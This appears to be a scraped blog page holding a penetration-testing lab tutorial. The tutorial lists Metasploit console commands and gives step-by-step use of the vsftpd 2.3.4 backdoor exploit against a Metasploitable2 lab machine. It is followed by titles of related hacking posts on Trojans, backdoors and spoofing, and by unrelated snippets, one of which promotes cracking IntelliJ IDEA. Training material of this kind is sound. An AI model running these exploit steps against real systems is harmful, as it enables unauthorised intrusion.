SERVER SIDE ATTACKS - METASPLOIT

Metasploit is an exploit development and execution tool. It can also be used to carry out other penetration testing tasks such as port scans, service identification and post exploitation tasks.

> msfconsole - runs the metasploit console

> help - shows help

> show[something] - something can be exploits, payloads, auxiliaries or options.

> use[something] - use a certain exploit, payload or auxiliary.

> set [option][value] - configure [option] to have a value of [value]

> exploit - runs the current task

Target: Metasploitable2

Tool: Zenmap, Metasploit on Kali Linux

Scan the target machine, and find the vsftpd. You can find the backdoor on this application.(https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor)

Exploit the target machine follow below steps.

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf exploit(vsftpd_234_backdoor) > show targets

    ...targets...

msf exploit(vsftpd_234_backdoor) > set TARGET < target-id >

msf exploit(vsftpd_234_backdoor) > show options

    ...show and set options...

msf exploit(vsftpd_234_backdoor) > exploit

Now exploit the target machine sucessfully.

Ethical Hacking - GAINING ACCESS(4)的更多相关文章

  1. Ethical Hacking - GAINING ACCESS(1)

    Gaining Access Introduction Everything is a computer Two main approaches (1)Server Side Do not requi ...

  2. Ethical Hacking - GAINING ACCESS(23)

    CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and ...

  3. Ethical Hacking - GAINING ACCESS(6)

    Server Side Attack Analysing scan results and exploiting target system. Go to the Analysis page and ...

  4. Ethical Hacking - GAINING ACCESS(24)

    CLIENT SIDE ATTACKS - Detecting Trojan manually or using a sandbox Analyzing trojans Check the prope ...

  5. Ethical Hacking - GAINING ACCESS(22)

    CLIENT SIDE ATTACKS - BeEf Framework Browser Exploitation Framework allowing us to launch a number o ...

  6. Ethical Hacking - GAINING ACCESS(21)

    CLIENT SIDE ATTACKS - Trojan delivery method - using email spoofing Use gathered info to contract ta ...

  7. Ethical Hacking - GAINING ACCESS(20)

    CLIENT SIDE ATTACKS - Spoofing backdoor extension Change the extension of the trojan from exe to a s ...

  8. Ethical Hacking - GAINING ACCESS(19)

    Client-Side Attacks - Social Engineering Tool: The FAT RAT Just like Veil, it generates Undetectable ...

  9. Ethical Hacking - GAINING ACCESS(18)

    CLIENT SIDE ATTACKS Backdooring ANY file Combine backdoor with any file - Generic solution. Users ar ...

  10. Ethical Hacking - GAINING ACCESS(17)

    CLIENT SIDE ATTACKS - Backdooring exe' s Download an executable file first. VEIL - FRAMEWORK A backd ...

随机推荐

  1. 移动 Ubuntu16.04 桌面左侧的启动器到屏幕底部_设置方法

    通过命令行,对 Launcher 的位置进行一下调整. 按下 Ctrl + Alt + t 键盘组合键,调出终端,在终端中输入以下命令: gsettings set com.canonical.Uni ...

  2. opencv视频教程分享

    opencv视频教程分享-在线与网盘 https://pan.baidu.com/s/1oAcctlS 密码:i5rd 链接:https://pan.baidu.com/s/1kVJ3iSJ  密码: ...

  3. 剑指 Offer 09. 用两个栈实现队列

    剑指 Offer 09. 用两个栈实现队列 用两个栈实现一个队列.队列的声明如下,请实现它的两个函数 appendTail 和 deleteHead ,分别完成在队列尾部插入整数和在队列头部删除整数的 ...

  4. Python的多继承问题-MRO和C3算法

    大部分内容转载自C3 线性化算法与 MRO 理解Python中的多继承 Python 中的方法解析顺序(Method Resolution Order, MRO)定义了多继承存在时 Python 解释 ...

  5. 强大的IntelliJ IDEA怎么破解?

    IntelliJ IDEA是非常好用的一个开发工具,怎么样才可以破解也是非常关键的问题,本文简单介绍破解方法. 第一种方式,我们进入以下网站http://idea.lanyus.com/ 这里要注意一 ...

  6. [ APUE ] 第三章 文件系统

    1. 文件描述符 打开或创建一个文件时,内核向进程返回一个文件描述符,当读.写一个文件时,用open()或creat()返回的文件描述符标识该文件,将其作为参数传递给write.read. stdin ...

  7. weblogic高级进阶之查看日志

    域的日志位于 D:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\logs 名字是base_domai ...

  8. 09.spring框架整合junit

    在正常的实际开发中都是按照上面这种方式来进行管理的.

  9. 深度学习“四大名著”发布!Python、TensorFlow、机器学习、深度学习四件套!

    Python 程序员深度学习的"四大名著": 这四本书着实很不错!我们都知道现在机器学习.深度学习的资料太多了,面对海量资源,往往陷入到"无从下手"的困惑出境. ...

  10. maven在windows10系统下安装配置和打包war

    maven下载地址:http://maven.apache.org/ 下载完成解压到 D盘 目录下D:\apache-maven-3.5.0\bin 配置maven环境变量: M2_HOME   D: ...